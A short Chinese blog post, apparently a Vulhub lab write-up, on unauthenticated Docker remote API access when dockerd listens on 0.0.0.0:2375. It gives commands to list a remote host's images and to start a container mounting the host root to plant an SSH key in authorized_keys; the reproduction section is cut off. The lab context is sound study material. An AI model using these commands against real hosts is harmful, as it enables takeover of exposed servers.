vulhub漏洞—docker_daemon_api未授权访问漏洞

Alex 好物分享

docker remote api
docker remote api主要的目的是取代命令行界面,
docker client和docker daemon通过unix domain socket进行通信.
默认情况下,只有本机的root和docker组用户才能操作docker.
漏洞成因
dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375
docker守护进程监听在0.0.0.0,外网可访问
没有使用iptable等限制可连接的来源ip
漏洞危害及常见的攻击方式
1.远程对被攻击主机的docker容器进行操作
docker -H tcp://*.*.*.*:2375 images
2.远程启动被攻击主机的docker容器,并挂载宿主机的目录,通过容器来修改宿主机的author ized_ keys文件,写入公钥。
docker H tcp://*.*.*.*:2375 run -it-v /:/mnt imagelD /bin/sh
漏洞复现
vulhu

vulhub漏洞—docker_daemon_api未授权访问漏洞最先出现在Python成神之路

版权声明:
作者:Alex
链接:https://www.techfm.club/p/9810.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>